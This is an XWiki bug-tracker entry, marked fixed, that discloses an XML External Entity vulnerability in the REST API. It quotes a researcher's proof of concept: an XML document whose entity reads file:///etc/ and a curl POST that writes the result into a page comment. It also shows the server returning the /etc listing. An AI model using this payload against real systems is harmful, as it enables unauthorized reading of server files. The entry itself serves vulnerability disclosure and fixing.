Resolution: Fixed
from an email I got:
The XWiki REST API is vulnerable to an XML External Entity attack. This vulnerability allows at least to read any file and directory accessible to the user running the application. The following PoC will create a comment including a listing of the '/etc/' directory. * XML document (com.xml) : <!DOCTYPE comment [ <!ENTITY bingo SYSTEM "file:///etc/"> ]> <comment xmlns=""> <text>This is a comment. Nothing fancy but -- &bingo; -- ...</text> </comment> * Call to the REST API : curl -u XXX:XXX -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://XXX/xwiki/rest/wikis/XXX/spaces/XXX/pages/XXX/comments" Regards, Nicolas Grégoire
user@debo8:~$ curl -u user:passwd -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "" <?xml version="1.0" encoding="UTF-8" standalone="yes"?><comment xmlns=""><link rel="" href=""/><id>2</id><author>XWiki.user</author><date>2012-04-11T20:46:59.040-04:00</date><text>This is a comment. Nothing fancy but -- .java .pwd.lock acpi adduser.conf adjtime aliases alsa alternatives anacrontab apache2 apm apt asound.names asound.state at.deny avahi bash_completion bash_completion.d bash.bashrc bindresvport.blacklist bluetooth bonobo-activation ca-certificates ca-certificates.conf ca-certificates.conf.dpkg-old calendar chatscripts chromium chromium-browser clutter-imcontext colord.conf compizconfig console ConsoleKit console-tools cron.d cron.daily cron.hourly cron.monthly cron.weekly crontab crypttab cups dbus-1 debconf.conf debian_version default defoma deluser.conf dfs dhcp dhcp3 dictionaries-common dkms dm dnsmasq.conf dnsmasq.conf.dpkg-old dnsmasq.d doc-base dpkg dumpasn1 emacs email-addresses environment esound ethertypes exim4 exports fam.conf festival.scm fonts foomatic fop.conf.d fstab fstab.d fuse.conf gai.conf gconf gdb gdm ghostscript gimp gnashpluginrc gnashrc gnome gnome-system-tools gnome-vfs-2.0 gnome-vfs-mime-magic gre.d groff groovy group group- grub.d gshadow gshadow- gssapi_mech.conf gtk-2.0 gtk-3.0 gtkmathview hal hddtemp.db hdparm.conf hesiod.conf host.conf hostname hosts hosts.allow hosts.deny hp icedove icedtea-web iceweasel idmapd.conf ImageMagick inetd.conf init.d initramfs-tools inittab inputrc insserv insserv.conf insserv.conf.d iproute2 irssi.conf issue java java-6-cacao java-6-openjdk java-6-sun javascript-common john kde3 kernel kernel-img.conf kerneloops.conf kernel-pkg.conf keys kvm labrea ldap libao.conf libaudit.conf libgda-3.0 libpaper.d libreoffice libvirt lighttpd locale.alias locale.gen localtime logcheck login.defs logrotate.conf logrotate.d lsb-base lvm lynx-cur magic magic.mime mail.rc mailcap mailcap.order mailname manpath.config maven2 menu menu-methods mercurial mime.types mke2fs.conf modprobe.d modules mono motd motd.tail mplayer mtab mtools.conf Muttrc Muttrc.d mysql nanorc netconfig netscsid.conf network NetworkManager networks nsswitch.conf obex-data-server openal OpenCL openoffice openvpn opt oss.conf pam.conf pam.d pango papersize passwd passwd- perl pm pnm2ppa.conf polipo polkit-1 postgresql postgresql-common ppp prelink.conf profile profile.d protocols pulse purple python python2.5 python2.6 python2.7 qemu-ifup rc.local rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rcS.d rearj.cfg reportbug.conf resolv.conf resolvconf rmt rpc rsyslog.conf rsyslog.d samba sane.d sasl2 screenrc securetty security selinux sensors.conf sensors.d sensors3.conf services sgml shadow shadow- shells skel smartd.conf smartmontools smi.conf snmp sound speech-dispatcher ssh ssl subversion sudoers sudoers.d sudoers.dpkg-dist sysconfig sysctl.conf sysctl.conf.dpkg-old sysctl.d systemd terminfo texmf timezone timidity tomcat5.5 tor ts.conf tsocks.conf ucf.conf udev ufw updatedb.conf update-notifier UPower vde2 velocity vga vim vpnc w3m wgetrc wildmidi wireshark wodim.conf wpa_supplicant X11 xchat-systray xdg xen xml zfs -- ...</text><replyTo xmlns:xsi="" xsi:nil="true"/></comment>user@debo8:~$
Not repeatable with guest user even if guest is allowed to comment.
user@debo8:~$ curl -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "" Error number 9001 in 9: Access denied in edit mode on document xwiki:Main.WebHomeuser@debo8:~$
Issue Links
- relates to
XWIKI-12910 Security Hole in the XML-RPC component
- Closed